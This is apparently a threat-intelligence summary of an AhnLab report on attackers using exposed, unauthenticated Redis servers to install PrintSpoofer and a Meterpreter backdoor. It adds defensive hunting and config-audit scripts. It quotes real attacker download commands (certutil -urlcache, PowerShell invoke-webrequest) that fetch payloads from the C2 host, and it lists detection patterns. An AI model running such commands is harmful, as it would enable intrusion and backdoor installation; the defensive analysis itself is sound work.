Metasploit Meterpreter Installed via Redis Server

AhnLab reported that threat actors abused publicly exposed Redis servers (version 3.x) with disabled authentication to deploy PrintSpoofer for privilege escalation and then install a Metasploit Meterpreter backdoor via a small Stager that downloads the payload from a C2. Immediate indicators include MD5s for the Stager and PrintSpoofer binaries, the C2 IP 34.124.148[.]215:9070, and download host 35.185.187[.]24. #Meterpreter #Redis

Keypoints

  • Externally exposed Redis servers (notably Redis 3.x) with authentication disabled were targeted to gain initial access.
  • The attacker placed PrintSpoofer into the Redis installation path to escalate privileges by abusing SeImpersonatePrivilege.
  • The PrintSpoofer binary was retrieved using PowerShell invoke-webrequest or certutil-based download commands.
  • A small Metasploit Stager using reverse TCP connected to a C2 server to download and execute the Meterpreter payload in memory.
  • Meterpreter execution enabled full remote control and potential lateral movement within affected networks.
  • Detected IOCs include specific MD5 hashes for meteran.exe and PrintSpoofer variants, the C2 34.124.148[.]215:9070, and download URLs hosted on 35.185.187[.]24.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Threat actors leveraged exposed Redis instances with disabled authentication to gain access. (‘Redis servers open to the public on the Internet with the authentication feature disabled.’)
  • [T1059.001] PowerShell – PowerShell invoke-webrequest was used to download PrintSpoofer into the Redis install path. (‘PowerShell’s “invoke-webrequest” command was used for installation, and the tool was downloaded in the installation path for Redis.’)
  • [T1218.005] Signed Binary Proxy Execution – CertUtil was used as a signed Windows utility to fetch PrintSpoofer binaries. (‘certutil -urlcache -split -f “hxxp://35.185.187[.]24/PrintSpoofer.exe” psf.exe’)
  • [T1068] Exploitation for Privilege Escalation – PrintSpoofer was deployed to abuse SeImpersonatePrivilege and escalate privileges. (‘PrintSpoofer is a tool that abuses SeImpersonatePrivilege to escalate the user’s privileges.’)
  • [T1105] Ingress Tool Transfer – A Metasploit Stager retrieved the Meterpreter payload from a remote C2 server. (‘When Stager is executed, it connects to the C&C server to download the Meterpreter backdoor.’)
  • [T1055] Process Injection – Meterpreter was executed in memory to avoid disk-based detection and provide remote control. (‘Meterpreter is executed in the memory, allowing the threat actor to take control over the infected system.’)
  • [T1053] Scheduled Task/Job – One documented infection method for Redis-based malware is registering a malware-executing command as a scheduled task (cron). (‘One of the two main ones is registering the malware-executing command as a Cron task’)

Indicators of Compromise

  • [MD5 hashes] Malware samples – cff64cc3e82aebd7a7e81f1633b5040e (meteran.exe), dbdcbacbc74b139d914747690ebe0e1c (PrintSpoofer.exe), and one more hash.
  • [C2 IP] Command-and-control server – 34.124.148[.]215:9070 (used by the Meterpreter/Stager connection).
  • [Download URLs] Remote hosting for payloads – hxxp://35.185.187[.]24/PrintSpoofer.exe, hxxp://35.185.187[.]24/meteran.exe, and one additional URL (ps.exe).
  • [File names] Deployed binaries and stagers – PrintSpoofer.exe, ps.exe, meteran.exe (Stager/Meterpreter files observed in the Redis install path).
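The script below is an added hunting example, not code from AhnLab or from this summary. It runs the IoCs listed above (the two MD5s, the two addresses and the file names) together with the two download patterns from the MITRE list (certutil -urlcache and PowerShell invoke-webrequest) over a few constructed process-creation events. The pipe-separated event layout, the heuristic that redis-server.exe should never spawn a shell or certutil, and the all-zero placeholder hashes for benign system binaries are assumptions made for the example.

```python
"""Hunt for the page's IoCs and download patterns in process-creation events.

Added example; not code from AhnLab or from the page. Only the hashes, the two
addresses and the file names come from the page's IoC list. The event format
(ts|host|parent_image|image|md5|cmdline) and the sample events are constructed.
"""
import re

# IoCs from the page, refanged so they can be matched against raw telemetry.
IOC_MD5 = {
    "cff64cc3e82aebd7a7e81f1633b5040e",  # meteran.exe (Meterpreter payload)
    "dbdcbacbc74b139d914747690ebe0e1c",  # PrintSpoofer.exe
}
IOC_IPS = {"34.124.148.215", "35.185.187.24"}  # C2 and download host
IOC_FILENAMES = {"printspoofer.exe", "psf.exe", "meteran.exe", "ps.exe"}

# T1218.005: certutil used as a downloader (-urlcache ... -f <url>).
CERTUTIL_DL = re.compile(r"\bcertutil(?:\.exe)?\b(?=.*-urlcache)(?=.*\s-f\b).*https?://", re.I)
# T1059.001: PowerShell Invoke-WebRequest (or its iwr alias) fetching a URL.
PS_DL = re.compile(r"\b(?:invoke-webrequest|iwr)\b.*https?://", re.I)
# Assumed heuristic: the Redis service itself should never spawn these.
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}


def refang(text):
    """Turn defanged indicators (hxxp, [.]) back into matchable form."""
    return text.replace("[.]", ".").replace("hxxp://", "http://")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(line):
    """Return findings for one 'ts|host|parent|image|md5|cmdline' event."""
    _ts, _host, parent, image, md5, cmdline = line.split("|", 5)
    cmd = refang(cmdline)
    img = basename(image)
    findings = []
    if md5.lower() in IOC_MD5:
        findings.append(f"known-bad MD5 {md5} ({img})")
    if img in IOC_FILENAMES:
        findings.append(f"IoC file name executed: {img}")
    for ip in sorted(IOC_IPS):
        # Anchor on non-digit/non-dot so 35.185.187.24 does not match .241.
        if re.search(rf"(?<![\d.]){re.escape(ip)}(?![\d.])", cmd):
            findings.append(f"IoC address in command line: {ip}")
    if CERTUTIL_DL.search(cmd):
        findings.append("T1218.005 certutil -urlcache download")
    if PS_DL.search(cmd):
        findings.append("T1059.001 PowerShell Invoke-WebRequest download")
    if basename(parent) == "redis-server.exe" and img in LOLBINS:
        findings.append(f"redis-server.exe spawned {img} (assumed heuristic)")
    return findings


def hunt(events):
    """Analyze every event; returns one findings list per event, in order."""
    return [analyze_event(e) for e in events]


# Constructed events. Hashes for system binaries are 32-zero placeholders.
PLACEHOLDER_MD5 = "0" * 32
SAMPLE_EVENTS = [
    "2024-01-01T10:00:00Z|REDIS01|C:\\Redis\\redis-server.exe|C:\\Windows\\System32\\cmd.exe|"
    + PLACEHOLDER_MD5 + "|cmd.exe /c certutil -urlcache -split -f hxxp://35.185.187[.]24/PrintSpoofer.exe psf.exe",
    "2024-01-01T10:00:05Z|REDIS01|C:\\Redis\\redis-server.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    + PLACEHOLDER_MD5 + "|powershell -c invoke-webrequest hxxp://35.185.187[.]24/meteran.exe -OutFile meteran.exe",
    "2024-01-01T10:00:10Z|REDIS01|C:\\Windows\\System32\\cmd.exe|C:\\Redis\\psf.exe|dbdcbacbc74b139d914747690ebe0e1c|psf.exe",
    "2024-01-01T10:00:20Z|REDIS01|C:\\Windows\\System32\\cmd.exe|C:\\Redis\\meteran.exe|cff64cc3e82aebd7a7e81f1633b5040e|meteran.exe",
    # Benign: an admin hashing a file with certutil (no -urlcache, no URL).
    "2024-01-01T11:00:00Z|ADMIN01|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\certutil.exe|"
    + PLACEHOLDER_MD5 + "|certutil -hashfile C:\\tmp\\report.pdf MD5",
]

if __name__ == "__main__":
    for event, findings in zip(SAMPLE_EVENTS, hunt(SAMPLE_EVENTS)):
        print(event.split("|")[0], findings or "clean")
```

The hash and file-name checks are the brittle part (a recompiled stager changes both); the certutil/Invoke-WebRequest patterns and the parent-process rule survive that, which is why the script reports them separately rather than collapsing everything into one score.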

The attacker targeted exposed Windows Redis 3.x instances with authentication disabled and used them to write and execute binaries within the Redis installation path. Initial delivery used either PowerShell invoke-webrequest or certutil to fetch PrintSpoofer (a SeImpersonatePrivilege exploitation tool) into the Redis directory; a sample download command observed was certutil -urlcache -split -f “hxxp://35.185.187[.]24/PrintSpoofer.exe” psf.exe. PrintSpoofer facilitated privilege escalation so subsequent payloads could run with higher rights.

After elevating privileges, the actor deployed a small Metasploit Stager built for reverse TCP. When executed, this Stager connected to the attacker-controlled C2 to download meteran.exe (the Meterpreter payload) and execute it in memory, enabling remote interactive control and potential lateral movement within the network. The chain therefore combined exploitation of a public-facing Redis service, signed-binary download techniques, local privilege escalation, ingress tool transfer, and in-memory backdoor execution.

Defensive focus should be on patching or removing publicly exposed Redis instances, enforcing authentication and network restrictions, monitoring for signed-binary usage like certutil, and hunting for the listed hashes, filenames, and C2 connections (34.124.148[.]215:9070 and downloads from 35.185.187[.]24).
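As an added example of the configuration side of that advice (not code from AhnLab or from this summary), the script below audits a redis.conf-style text for the three settings that together produce the exposure the report describes: no requirepass, a missing or wildcard bind, and protected-mode turned off. The weak and hardened config texts are constructed; the directive syntax is Redis's own (the Windows 3.x port reads the same syntax from redis.windows.conf), and the 16-character password minimum is an assumed local policy rather than a Redis setting.

```python
"""Audit a Redis configuration for the exposure the page describes.

Added example; not from AhnLab or the page. Flags no requirepass, a wildcard or
missing bind, and protected-mode off. Both config texts below are constructed.
"""
import shlex

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}
MIN_PASSWORD_LEN = 16  # assumption: a local policy minimum, not a Redis setting


def parse_conf(text):
    """Map lowercase directive -> list of argument lists, in file order."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted values such as requirepass "x y"
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def last(directives, name):
    """Arguments of the last occurrence of a directive (Redis honours the last), or []."""
    return directives.get(name, [[]])[-1]


def audit(conf_text):
    """Return a list of findings; an empty list means none of the checks fired."""
    d = parse_conf(conf_text)
    findings = []

    # Conservatively consider every address from every bind line.
    binds = [addr for args in d.get("bind", []) for addr in args]
    if not binds or any(b in WILDCARD_BINDS for b in binds):
        findings.append("bind: missing or wildcard, so Redis listens on every interface")

    pm = last(d, "protected-mode")
    if not pm or pm[0].lower() != "yes":
        # protected-mode exists from 3.2; on older 3.x builds only bind/requirepass help.
        findings.append("protected-mode: not 'yes'")

    rp = last(d, "requirepass")
    if not rp or not rp[0]:
        findings.append("requirepass: not set, any client can run commands unauthenticated")
    elif len(rp[0]) < MIN_PASSWORD_LEN:
        findings.append("requirepass: shorter than %d characters" % MIN_PASSWORD_LEN)
    return findings


# Constructed: the weak shape the page describes (public, no auth).
WEAK_CONF = """\
bind 0.0.0.0
port 6379
protected-mode no
# requirepass intentionally absent
"""

# Constructed hardened counterpart; the password value is a placeholder.
HARDENED_CONF = """\
bind 127.0.0.1
port 6379
protected-mode yes
requirepass "REPLACE-WITH-A-LONG-RANDOM-SECRET"
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf) or "no findings")
```

Run it against each server's live config file during the exposure review; a bind to an internal address still needs a host or perimeter firewall rule in front of it, which this file-level check cannot see.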

Read more: https://asec.ahnlab.com/en/64034/